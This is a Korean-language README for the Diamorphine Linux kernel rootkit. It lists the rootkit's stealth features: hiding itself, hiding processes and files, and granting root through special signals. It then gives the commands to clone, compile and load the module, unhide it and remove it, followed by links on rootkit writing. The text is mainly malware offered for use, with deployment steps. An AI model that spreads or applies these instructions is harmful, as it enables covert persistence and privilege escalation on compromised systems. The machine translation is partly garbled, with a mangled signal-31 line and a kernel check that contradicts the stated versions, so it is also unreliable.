Diamorphine

Diamorphine은 Linux 커널 2.6.x/3.x/4.x/5.x/6.x(x86/x86_64 및 ARM64)용 LKM 루트킷입니다.

• 로드되면 모듈이 보이지 않게 시작됩니다.

• 신호를 전송하여 프로세스를 숨기거나 숨기기 해제합니다. 31;

• 신호 63(어떤 pid에든)을 보내면 모듈이 (보이지 않게) 됩니다.

• 신호(64)를 임의의 pid로 보내면 해당 사용자가 루트가 됩니다.

• MAGIC_PREFIX로 시작하는 파일이나 디렉터리는 보이지 않게 됩니다.

• 출처: https://github.com/m0nad/Diamorphine

커널이 2.6.x/3.x/4.x/5.x인지 확인하세요.

 uname -r

저장소 복제

 git clone https://github.com/m0nad/Diamorphine

폴더를 입력하세요

 cd Diamorphine

엮다

 make

모듈 로드(루트로)

 insmod diamorphine.ko

모듈이 보이지 않게 시작됩니다. 제거하려면 모듈을 표시해야 합니다.

 kill -63 0

그런 다음 모듈을 제거하십시오 (루트로)

 rmmod diamorphine

위키피디아 루트킷 https://en.wikipedia.org/wiki/Rootkit

Linux 장치 드라이버 http://lwn.net/Kernel/LDD3/

LKM 해킹 https://web.archive.org/web/20140701183221/https://www.thc.org/papers/LKM_HACKING.html

Memset의 블로그 http://memset.wordpress.com/

LKM 없이 Linux 즉시 커널 패치 적용 http://phrack.org/issues/58/7.html

LINUX용 간단한 루트킷 작성하기 https://web.archive.org/web/20160620231623/http://big-daddy.fr/repository/Documentation/Hacking/Security/Malware/Rootkits/writing-rootkit.txt

Linux 상호 참조 http://lxr.free-electrons.com/

zizzu0 LinuxKernelModules https://github.com/zizzu0/LinuxKernelModules/

Linux 루트킷: 커널 5.7 이상을 위한 새로운 방법 https://xcellerator.github.io/posts/linux_rootkits_11/